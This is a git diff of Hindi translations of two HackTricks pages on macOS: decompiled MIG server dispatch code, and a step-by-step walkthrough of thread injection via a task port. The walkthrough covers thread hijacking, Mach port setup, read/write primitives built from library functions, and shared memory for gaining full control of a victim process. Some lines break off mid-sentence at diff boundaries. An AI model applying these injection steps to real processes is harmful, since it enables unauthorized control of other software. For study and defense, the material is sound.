 <strong>            rax = *(sign_extend_64(rax - 0x1f4) * 0x28 + 0x100004040);
 </strong>            var_20 = rax;
-// यदि - अन्यथा, यदि झूठा लौटाता है, जबकि अन्यथा सही फंक्शन को कॉल करता है और सच लौटाता है
+// यदि - अन्यथा, यदि गलत लौटाता है, जबकि अन्यथा सही फ़ंक्शन को कॉल करता है और सच लौटाता है
 <strong>            if (rax == 0x0) {
 </strong>                    *(var_18 + 0x18) = **_NDR_record;
 *(int32_t *)(var_18 + 0x20) = 0xfffffffffffffed1;
 var_4 = 0x0;
 }
 else {
-// दो तर्कों के साथ सही फंक्शन को कॉल करने वाला गणना किया गया पता
+// 2 तर्कों के साथ सही फ़ंक्शन को कॉल करने वाला गणना किया गया पता
 <strong>                    (var_20)(var_10, var_18);
 </strong>                    var_4 = 0x1;
 }
@ -254,7 +256,7 @@ return rax;
 {% endtab %}

 {% tab title="myipc_server decompiled 2" %}
-यह वही फंक्शन है जिसे Hopper के निःशुल्क संस्करण में अलग तरीके से डिकंपाइल किया गया है:
+यह वही फ़ंक्शन है जिसे Hopper के मुफ्त संस्करण में अलग तरीके से डिकंपाइल किया गया है:

 <pre class="language-c"><code class="lang-c">int _myipc_server(int arg0, int arg1) {
 r31 = r31 - 0x40;
@ -262,7 +264,7 @@ saved_fp = r29;
 stack[-8] = r30;
 var_10 = arg0;
 var_18 = arg1;
-// प्रारंभिक निर्देश सही फंक्शन पॉइंटर्स को खोजने के लिए
+// प्रारंभिक निर्देश सही फ़ंक्शन पॉइंटर्स को खोजने के लिए
 *(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f | 0x0;
 *(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
 *(int32_t *)(var_18 + 0x4) = 0x24;
@ -298,14 +300,14 @@ r8 = 0x1;
 }
 }
 // पिछले संस्करण की तरह ही यदि अन्यथा
-// 0x100004040 पते का उपयोग देखें (फंक्शन्स के पते की सरणी)
+// पते 0x100004040 की जांच करें (फ़ंक्शन्स के पते की सरणी)
 <strong>                    if ((r8 &#x26; 0x1) == 0x0) {
 </strong><strong>                            *(var_18 + 0x18) = **0x100004000;
 </strong>                            *(int32_t *)(var_18 + 0x20) = 0xfffffed1;
 var_4 = 0x0;
 }
 else {
-// उस गणना किए गए पते पर कॉल करना जहां फंक्शन होना चाहिए
+// उस गणना किए गए पते पर कॉल करें जहां फ़ंक्शन होना चाहिए
 <strong>                            (var_20)(var_10, var_18);
 </strong>                            var_4 = 0x1;
 }
@ -329,22 +331,24 @@ return r0;
 {% endtab %}
 {% endtabs %}

-वास्तव में यदि आप **`0x100004000`** फंक्शन पर जाते हैं तो आपको **`routine_descriptor`** संरचनाओं की सरणी मिलेगी। संरचना का पहला तत्व वह **पता** है जहां **फंक्शन** कार्यान्वित किया गया है, और **संरचना 0x28 बाइट्स लेती है**, इसलिए प्रत्येक 0x28 बाइट्स (बाइट 0 से शुरू होकर) आप 8 बाइट्स प्राप्त कर सकते हैं और वह **फंक्शन का पता** होगा जिसे कॉल किया जाएगा:
-
-<figure><img src="../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+वास्तव में यदि आप फ़ंक्शन **`0x100004000`** पर जाते हैं तो आपको **`routine_descriptor`** संरचनाओं की सरणी मिलेगी। संरचना का पहला तत्व वह **पता** है जहां **फ़ंक्शन** कार्यान्वित किया गया है, और **संरचना 0x28 बाइट्स लेती है**, इसलिए प्रत्येक 0x28 बाइट्स (बाइट 0 से शुरू होकर) आप 8 बाइट्स प्राप्त कर सकते हैं और वह **फ़ंक्शन का पता** होगा जिसे कॉल किया जाएगा:

 <figure><img src="../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

+<figure><img src="../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+
 इस डेटा को [**इस Hopper स्क्रिप्ट का उपयोग करके निकाला जा सकता है**](https://github.com/knightsc/hopper/blob/master/scripts/MIG%20Detect.py).

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>यहाँ क्लिक करें!</strong></a><strong>!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुंच प्राप्त करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
 * [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **hacktricks repo** और **hacktricks-cloud repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में शामिल हों या **Twitter** पर मुझे **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
@ -1,14 +1,16 @@
-# macOS टास्क पोर्ट के माध्यम से थ्रेड इंजेक्शन
+# macOS थ्रेड इंजेक्शन वाया टास्क पोर्ट

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
-* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने हैकिंग ट्रिक्स साझा करें।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.

 </details>

@ -21,18 +23,31 @@

 ### 1. थ्रेड हाइजैकिंग

-सबसे पहले हम करते हैं **`task_threads()`** को टास्क पोर्ट पर कॉल करके रिमोट टास्क में थ्रेड की सूची प्राप्त करने के लिए और फिर उनमें से एक को हाइजैक करने के लिए चुनते हैं। पारंपरिक कोड इंजेक्शन फ्रेमवर्क के विपरीत, हम **नया रिमोट थ्रेड नहीं बना सकते** क्योंकि `thread_create_running()` नई मिटिगेशन द्वारा ब्लॉक हो जाएगा।
+सबसे पहले हम **`task_threads()`** को टास्क पोर्ट पर कॉल करते हैं ताकि रिमोट टास्क में थ्रेड्स की सूची प्राप्त कर सकें और फिर उनमें से एक को हाइजैक करने के लिए चुनें। पारंपरिक कोड इंजेक्शन फ्रेमवर्क्स के विपरीत, हम **नया रिमोट थ्रेड नहीं बना सकते** क्योंकि `thread_create_running()` को नए मिटिगेशन द्वारा ब्लॉक किया जाएगा।

-फिर, हम **`thread_suspend()`** को कॉल करके थ्रेड को रनिंग से रोक सकते हैं।
+फिर, हम **`thread_suspend()`** को कॉल कर सकते हैं ताकि थ्रेड को चलने से रोक सकें।

-इस बिंदु पर, हमारे पास रिमोट थ्रेड पर केवल यह उपयोगी नियंत्रण है कि हम उसे रोक सकते हैं, उसे शुरू कर सकते हैं, उसके रजिस्टर मान प्राप्त कर सकते हैं, और उसके रजिस्टर मान सेट कर सकते हैं। इस प्रकार, हम रिमोट फंक्शन कोल आरंभ कर सकते हैं जिसके लिए हम रिमोट थ्रेड में रजिस्टर `x0` से `x7` को आर्ग्यूमेंट के रूप में सेट कर सकते हैं, रिमोट फंक्शन कोल करने के लिए `pc` को फ़ंक्शन के लिए सेट कर सकते हैं, और थ्रेड को शुरू कर सकते हैं। इस बिंदु पर, हमें वापसी का पता लगाना होगा और सुनिश्चित करना होगा कि थ्रेड क्रैश नहीं होता है।
+इस बिंदु पर, रिमोट थ्रेड पर हमारा एकमात्र उपयोगी नियंत्रण **रोकना** है, **शुरू करना** है, इसके **रजिस्टर** मानों को **प्राप्त करना** है, और इसके रजिस्टर **मानों को सेट करना** है। इस प्रकार, हम रिमोट थ्रेड में **रजिस्टर्स** `x0` से `x7` को **आर्ग्युमेंट्स** के लिए सेट करके, **`pc`** को हम जिस फंक्शन को एक्जीक्यूट करना चाहते हैं उसके लिए सेट करके और थ्रेड को शुरू करके एक रिमोट फंक्शन कॉल **इनिशिएट** कर सकते हैं। इस बिंदु पर, हमें रिटर्न का पता लगाने की जरूरत है और सुनिश्चित करना है कि थ्रेड क्रैश न हो।

-इसके कुछ तरीके हैं। एक तरीका यह हो सकता है कि हम `thread_set_exception_ports()` का उपयोग करके रिमोट थ्रेड के लिए एक अपवाद हैंडलर रजिस्टर करें और फ़ंक्शन को कॉल करने से पहले अमान्य पते पर रिटर्न एड्रेस रजिस्टर, `lr`, सेट करें; इस तरीके से, फ़ंक्शन चलाने के बाद एक अपवाद उत्पन्न होगा और एक संदेश हमारे अपवाद पोर्ट को भेजा जाएगा, जिस पर हम थ्रेड की स्थिति की जांच करके रिटर्न मान प्राप्त कर सकते हैं। हालांकि, सरलता के लिए मैंने इयान बीयर के ट्रिपल_फेच धोखाधड़ी में उपयोग किए गए रणनीति की प्रतिलिपि की है, जिसमें **`lr` को एक ऐसे निर्देशिका के पते पर सेट किया जाता है जो अनंत लूप करेगा** और फिर थ्रेड के रजिस्टर को बार-बार जांचते हैं जब तक **`pc` उस निर्देशिका की ओर इशारा
-### 3. मूल याद-लेखन <a href="#step-3-basic-memory-readwrite" id="step-3-basic-memory-readwrite"></a>
+इसके लिए कुछ तरीके हैं। एक तरीका होगा **रिमोट थ्रेड के लिए एक एक्सेप्शन हैंडलर रजिस्टर करना** `thread_set_exception_ports()` का उपयोग करके और फंक्शन को कॉल करने से पहले रिटर्न एड्रेस रजिस्टर, `lr`, को एक अवैध एड्रेस पर सेट करना; इस तरह, फंक्शन चलने के बाद एक एक्सेप्शन उत्पन्न होगा और हमारे एक्सेप्शन पोर्ट पर एक संदेश भेजा जाएगा, जिस बिंदु पर हम रिटर्न मान प्राप्त करने के लिए थ्रेड की स्थिति की जांच कर सकते हैं। हालांकि, सरलता के लिए मैंने Ian Beer के triple_fetch एक्सप्लॉइट में इस्तेमाल की गई रणनीति की नकल की, जो **`lr` को एक ऐसे निर्देश के पते पर सेट करना था जो अनंत लूप में जाएगा** और फिर बार-बार थ्रेड के रजिस्टर्स को पोल करना जब तक कि **`pc` उस निर्देश की ओर इशारा नहीं करता**।

-अब हम निष्पादन आधारभूत याद-लेखन और लेखन आधारभूत याद का उपयोग करेंगे। ये आधारभूत याद बहुत कुछ के लिए उपयोग नहीं होंगे (हम जल्द ही अधिक शक्तिशाली आधारभूत को अपग्रेड करेंगे), लेकिन ये हमें रिमोट प्रक्रिया के नियंत्रण को विस्तारित करने में मदद करने का महत्वपूर्ण कदम है।
+### 2. संचार के लिए Mach पोर्ट्स

-हमारे निष्पादन आधारभूत का उपयोग करके याद पढ़ने और लिखने के लिए, हम इन तरह के फ़ंक्शन की तलाश करेंगे:
+अगला कदम है **रिमोट थ्रेड के साथ संवाद करने के लिए Mach पोर्ट्स बनाना**। ये Mach पोर्ट्स बाद में काम आएंगे जब हमें टास्क्स के बीच मनमाने सेंड और रिसीव अधिकारों को स्थानांतरित करने में मदद करनी होगी।
+
+द्विदिश संचार स्थापित करने के लिए, हमें दो Mach रिसीव अधिकार बनाने होंगे: एक **स्थानीय टास्क में और एक रिमोट टास्क में**। फिर, हमें प्रत्येक पोर्ट के लिए **दूसरे टास्क में एक सेंड अधिकार स्थानांतरित करना** होगा। इससे प्रत्येक टास्क को एक ऐसा संदेश भेजने का तरीका मिलेगा जिसे दूसरे द्वारा प्राप्त किया जा सकता है।
+
+आइए पहले स्थानीय पोर्ट की स्थापना पर ध्यान दें, यानी वह पोर्ट जिसके लिए स्थानीय टास्क के पास रिसीव अधिकार है। हम `mach_port_allocate()` को कॉल करके Mach पोर्ट बना सकते हैं जैसे कोई अन्य। चाल यह है कि रिमोट टास्क में उस पोर्ट के लिए एक सेंड अधिकार को कैसे कॉपी करें।
+
+एक सुविधाजनक चाल जो हम उपयोग कर सकते हैं वह है रिमोट टास्क में एक सेंड अधिकार को कॉपी करने के लिए `thread_set_special_port()` का उपयोग करके रिमोट थ्रेड के `THREAD_KERNEL_PORT` विशेष पोर्ट में हमारे स्थानीय पोर्ट के लिए एक सेंड अधिकार को स्टैश करना; फिर, हम रिमोट थ्रेड को `mach_thread_self()` को कॉल करने के लिए बना सकते हैं ताकि सेंड अधिकार प्राप्त कर सकें।
+
+अगला हम रिमोट पोर्ट सेटअप करेंगे, जो लगभग वही है जो हमने अभी किया। हम रिमोट थ्रेड को `mach_reply_port()` को कॉल करके एक Mach पोर्ट आवंटित करने के लिए बना सकते हैं; हम `mach_port_allocate()` का उपयोग नहीं कर सकते क्योंकि बाद वाला आवंटित पोर्ट नाम को मेमोरी में लौटाता है और हमारे पास अभी तक एक रीड प्रिमिटिव नहीं है। एक बार जब हमारे पास एक पोर्ट होता है, तो हम रिमोट थ्रेड में `mach_port_insert_right()` को कॉल करके एक सेंड अधिकार बना सकते हैं। फिर, हम कर्नेल में पोर्ट को स्टैश करने के लिए `thread_set_special_port()` को कॉल कर सकते हैं। अंत में, स्थानीय टास्क में वापस, हम रिमोट थ्रेड पर `thread_get_special_port()` को कॉल करके पोर्ट को प्राप्त कर सकते हैं, **हमें रिमोट टास्क में अभी-अभी आवंटित Mach पोर्ट के लिए एक सेंड अधिकार देते हुए**।
+
+इस बिंदु पर, हमने द्विदिश संचार के लिए उपयोग किए जाने वाले Mach पोर्ट्स बना लिए हैं।
+
+### 3. बेसिक मेमोरी रीड/राइट <a href="#step-3-basic-memory-readwrite" id="step-3-basic-memory-readwrite"></a>
+
+अब हम बेसिक मेमोरी रीड और राइट प्रिमिटिव्स बनाने के लिए एक्जीक्यूट प्रिमिटिव का उपयोग करेंगे। ये प्रिमिटिव्स ज्यादा कु
 ```c
 uint64_t read_func(uint64_t *address) {
 return *address;
@ -41,7 +56,7 @@ void write_func(uint64_t *address, uint64_t value) {
 *address = value;
 }
 ```
-वे निम्नलिखित असेंबली के समान हो सकते हैं:
+वे निम्नलिखित असेंबली से मेल खा सकते हैं:
 ```
 _read_func:
 ldr     x0, [x0]
@ -50,39 +65,51 @@ _write_func:
 str     x1, [x0]
 ret
 ```
-कुछ सामान्य पुस्तकालयों की त्वरित स्कैन ने कुछ अच्छे उम्मीदवारों की पहचान की। मेमोरी को पढ़ने के लिए, हम [Objective-C रनटाइम पुस्तकालय](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) के `property_getName()` फ़ंक्शन का उपयोग कर सकते हैं:
+कुछ सामान्य लाइब्रेरीज की त्वरित स्कैनिंग से कुछ अच्छे उम्मीदवार सामने आए। मेमोरी पढ़ने के लिए, हम [Objective-C रनटाइम लाइब्रेरी](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) से `property_getName()` फंक्शन का उपयोग कर सकते हैं:
 ```c
 const char *property_getName(objc_property_t prop)
 {
 return prop->name;
 }
 ```
-जैसा कि पता चलता है, `prop` `objc_property_t` का पहला फ़ील्ड है, इसलिए यह सीधे अनुमानित `read_func` के समान है। हमें बस पहले तर्क के साथ एक दूरस्थ कार्य कोल करने की आवश्यकता है जिसमें पहला तर्क हमें पठना है, और वापसी मूल्य उस पते पर डेटा होगा।
+जैसा कि पता चलता है, `prop` यह `objc_property_t` का पहला फील्ड है, इसलिए यह सीधे ऊपर दिए गए काल्पनिक `read_func` से मेल खाता है। हमें बस एक रिमोट फंक्शन कॉल करने की जरूरत है जिसका पहला तर्क वह पता हो जिसे हम पढ़ना चाहते हैं, और रिटर्न वैल्यू उस पते पर मौजूद डेटा होगा।

-मेमोरी लिखने के लिए एक पूर्व-तैयार कार्य ढूंढ़ना थोड़ा मुश्किल है, लेकिन इसके बावजूद अनचाहे प्रभावों के बिना भी बड़े विकल्प हैं। libxpc में, `_xpc_int64_set_value()` फ़ंक्शन का निम्नलिखित डिसअसेंबली होता है:
+मेमोरी लिखने के लिए पहले से बने फंक्शन को ढूंढना थोड़ा कठिन है, लेकिन बिना अनचाहे साइड इफेक्ट्स के अभी भी शानदार विकल्प हैं। libxpc में, `_xpc_int64_set_value()` फंक्शन का निम्नलिखित डिसअसेंबली है:
 ```
 __xpc_int64_set_value:
 str     x1, [x0, #0x18]
 ret
 ```
-इस प्रक्रिया को करने के लिए, हम ठीक पते `address` पर 64-बिट लेख करने के लिए दूरस्थ कॉल कर सकते हैं:
+इस प्रकार, `address` पर 64-बिट लिखने के लिए, हम दूरस्थ कॉल कर सकते हैं:
 ```c
 _xpc_int64_set_value(address - 0x18, value)
 ```
-इन प्राथमिकताओं के साथ, हम साझा मेमोरी बनाने के लिए तैयार हैं।
-
 ### 4. साझा मेमोरी

-अगला कदम है रिमोट और स्थानीय टास्क के बीच साझा मेमोरी बनाना। इससे हमें प्रक्रियाओं के बीच डेटा को आसानी से स्थानांतरित करने की अनुमति मिलेगी: साझा मेमोरी क्षेत्र के साथ, विचित्र मेमोरी पठन और लेखन को `memcpy()` के रिमोट कॉल के माध्यम से करना इतना सरल हो जाता है। इसके अलावा, साझा मेमोरी क्षेत्र होने से हमें आसानी से एक स्टैक स्थापित करने की अनुमति मिलेगी, ताकि हम 8 से अधिक तर्कों के साथ फ़ंक्शन को कॉल कर सकें।
+हमारा अगला कदम दूरस्थ और स्थानीय कार्य के बीच साझा मेमोरी बनाना है। इससे हमें प्रक्रियाओं के बीच डेटा को आसानी से स्थानांतरित करने की अनुमति मिलेगी: साझा मेमोरी क्षेत्र के साथ, मनमानी मेमोरी पढ़ना और लिखना `memcpy()` के दूरस्थ कॉल के रूप में सरल है। इसके अलावा, साझा मेमोरी क्षेत्र होने से हमें 8 से अधिक तर्कों के साथ फ़ंक्शन कॉल करने के लिए एक स्टैक सेट अप करने में आसानी होगी।

-चीजों को आसान बनाने के लिए, हम लिब्रेरी libxpc की साझा मेमोरी सुविधाओं का पुनः उपयोग कर सकते हैं। Libxpc एक XPC ऑब्जेक्ट प्रकार, `OS_xpc_shmem` प्रदान करता है, जो XPC के माध्यम से साझा मेमोरी क्षेत्र स्थापित करने की अनुमति देता है। Libxpc को पलटकर, हम निर्धारित करते हैं कि `OS_xpc_shmem` मैच मेमोरी एंट्री पर आधारित है, जो मैच पोर्ट हैं जो एक वर्चुअल मेमोरी क्षेत्र को प्रतिष्ठित करते हैं। और क्योंकि हम पहले से ही दिखा चुके हैं कि रिमोट टास्क को मैच पोर्ट भेजने के लिए कैसे भेजा जा सकता है, इसे हम अपनी स्वयं की साझा मेमोरी स्थापित करने के लिए आसानी से उपयोग कर सकते हैं।
+चीजों को आसान बनाने के लिए, हम libxpc की साझा मेमोरी सुविधाओं का पुन: उपयोग कर सकते हैं। Libxpc XPC ऑब्जेक्ट प्रकार, `OS_xpc_shmem` प्रदान करता है, जो XPC के माध्यम से साझा मेमोरी क्षेत्रों की स्थापना की अनुमति देता है। Libxpc को उलटकर, हम निर्धारित करते हैं कि `OS_xpc_shmem` Mach मेमोरी प्रविष्टियों पर आधारित है, जो Mach पोर्ट्स हैं जो वर्चुअल मेमोरी के एक क्षेत्र का प्रतिनिधित्व करते हैं। और चूंकि हम पहले ही दिखा चुके हैं कि कैसे दूरस्थ कार्य को Mach पोर्ट्स भेजना है, हम इसका उपयोग अपनी साझा मेमोरी स्थापित करने के लिए आसानी से कर सकते हैं।

-सबसे पहले, हमें `mach_vm_allocate()` का उपयोग करके साझा करने वाली मेमोरी का आवंटन करना होगा। हमें `mach_vm_allocate()` का उपयोग करना होगा ताकि हम `xpc_shmem_create()` का उपयोग करके क्षेत्र के लिए `OS_xpc_shmem` ऑब्जेक्ट बना सकें। `xpc_shmem_create()` हमारे लिए मैच मेमोरी एंट्री को बनाने का ध्यान रखेगा और इसे अनुप्रयोग `OS_xpc_shmem` ऑब्जेक्ट में `0x18` ऑफ़सेट पर मेमोरी एंट्री के लिए मैच भेजने का अधिकार रखेगा।
+सबसे पहले, हमें `mach_vm_allocate()` का उपयोग करके साझा करने के लिए मेमोरी आवंटित करने की आवश्यकता है। हमें `mach_vm_allocate()` का उपयोग करना होगा ताकि हम `xpc_shmem_create()` का उपयोग करके क्षेत्र के लिए एक `OS_xpc_shmem` ऑब्जेक्ट बना सकें। `xpc_shmem_create()` हमारे लिए Mach मेमोरी प्रविष्टि बनाने का ध्यान रखेगा और अस्पष्ट `OS_xpc_shmem` ऑब्जेक्ट में ऑफसेट `0x18` पर मेमोरी प्रविष्टि के Mach सेंड राइट को स्टोर करेगा।

-एक बार जब हमें मेमोरी एंट्री पोर्ट मिल जाएगा, हम रिमोट प्रक्रिया में एक `OS_xpc_shmem` ऑब्जेक्ट बनाएंगे जो समान मेमोरी क्षेत्र को प्रतिष्ठित करेगा, जिससे हम `xpc_shmem_map()` को कॉल करके साझा मेमोरी मैपिंग स्थापित कर सकेंगे। सबसे पहले, हम रिमोट कॉल करके `malloc()` का उपयोग करके `OS_xpc_shmem` के लिए मेमोरी आवंटित करते हैं और अपनी मूल लिखने की प्राथमिकता का उपयोग करके स्थानीय `OS_xpc_shmem` ऑब्जेक्ट की सामग्री की प्रतिलिपि बनाते हैं। दुर्भाग्य से, परिणामस्वरूप ऑब्जेक्ट थोड़ा सही नहीं होता है: इसका मैच मेमोरी एंट्री फ़ील्ड `0x18` ऑफ़सेट पर स्थानीय टास्क के लिए मेमोरी एंट्री का नाम शामिल होता है, न कि रिमोट टास्क का नाम। इसे ठीक करने के लिए, हम `thread_set_special_port()` चाल चलाते हैं ताकि रिमोट टास्क में मैच मेमोरी एंट्री के लिए एक भेजने का अधिकार डाल सकें और फिर फ़ील्ड `0x18` को रिमोट मेमोरी एंट्री के नाम से अधिलेखित करें। इस बिंदु पर, रिमोट `OS_xpc_shmem` ऑब्जेक्ट मान्य होता है और मेमोरी मैपिंग को रिमोट कॉल के माध्यम से स्थापित किया जा सकता है `xpc_shmem_remote()`।
+एक बार जब हमारे पास मेमोरी प्रविष्टि पोर्ट होता है, तो हम दूरस्थ प्रक्रिया में एक `OS_xpc_shmem` ऑब्जेक्ट बनाएंगे जो उसी मेमोरी क्षेत्र का प्रतिनिधित्व करता है, जिससे हम `xpc_shmem_map()` को कॉल करके साझा मेमोरी मैपिंग स्थापित कर सकते हैं। पहले, हम `malloc()` को दूरस्थ कॉल करके `OS_xpc_shmem` के लिए मेमोरी आवंटित करते हैं और स्थानीय `OS_xpc_shmem` ऑब्जेक्ट की सामग्री को कॉपी करने के लिए हमारे मूल लिखने की प्राथमिकता का उपयोग करते हैं। दुर्भाग्य से, परिणामी ऑब्जेक्ट बिल्कुल सही नहीं है: इसके Mach मेमोरी प्रविष्टि क्षेत्र ऑफसेट `0x18` में स्थानीय कार्य का मेमोरी प्रविष्टि के लिए नाम होता है, न कि दूरस्थ कार्य का नाम। इसे ठीक करने के लिए, हम `thread_set_special_port()` चाल का उपयोग करते हैं ताकि दूरस्थ कार्य में Mach मेमोरी प्रविष्टि के लिए एक सेंड राइट डाल सकें और फिर क्षेत्र `0x18` को दूरस्थ मेमोरी प्रविष्टि के नाम से ओवरराइट करें। इस बिंदु पर, दूरस्थ `OS_xpc_shmem` ऑब्जेक्ट मान्य है और मेमोरी मैपिंग `xpc_shmem_remote()` को दूरस्थ कॉल करके स्थापित की जा सकती है।

 ### 5. पूर्ण नियंत्रण <a href="#step-5-full-control" id="step-5-full-control"></a>

-निश्चित पते पर साझा मेमोरी और एक ऐच्छिक निष्पादन प्राथमिकता के साथ, हम बस खत्म हो जाते हैं। विचित्र मेमोरी पठन और लेखन को `memcpy()` को कॉल करके साझा क्षेत्र में से किया जाता है। 8 से अधिक तर्कों के साथ फ़ंक्शन कॉल करने के लिए, हम कॉलिंग नियम के अनुसार पहले 8 के अलावा अतिरिक्त तर्कों को स्टैक पर व्यवस्थित करके करते हैं। टास्क के बीच विचित्र मैच पोर्ट को मैच संदेश भेजकर किया जा सकता है। हम इस तकनीक का उपयोग करके प्रक्रियाओं के बीच फ़ाइल डेस्क्रिप्टर भी स्थानांतरित कर सकते हैं (तिगुना लाभ के लिए इस तकनीक को दिखाने के लिए Ian Beer का धन्यवाद देते हैं!)।
+ज्ञात पते पर साझा मेमोरी और मनमानी निष्पादन प्राथमिकता के साथ, हम मूल रूप से कर चुके हैं। मनमानी मेमोरी पढ़ने और लिखने को क्रमशः साझा क्षेत्र में और बाहर `memcpy()` को कॉल करके लागू किया जाता है। 8 से अधिक तर्कों के साथ फ़ंक्शन कॉल को कॉलिंग कन्वेंशन के अनुसार पहले 8 के परे अतिरिक्त तर्कों को स्टैक पर रखकर किया जाता है। मनमानी Mach पोर्ट्स को कार्यों के बीच स्थानांतरित करना पहले स्थापित पोर्ट्स पर Mach संदेश भेजकर किया जा सकता है। हम प्रक्रियाओं के बीच फ़ाइल डिस्क्रिप्टर्स को भी स्थानांतरित कर सकते हैं fileports (triple_fetch में इस तकनीक का प्रदर्शन करने के लिए Ian Beer का विशेष धन्यवाद!) का उपयोग करके।

-संक्षेप में, अब हमारे पास पीड़ि
+संक्षेप में, हमारे पास अब पीड़ित प्रक्रिया पर पूर्ण और आसान नियंत्रण है। आप [threadexec](https://github.com/bazad/threadexec) पुस्तकालय में पूर्ण कार्यान्वयन और प्रदर्शित API देख सकते हैं।
+
+<details>
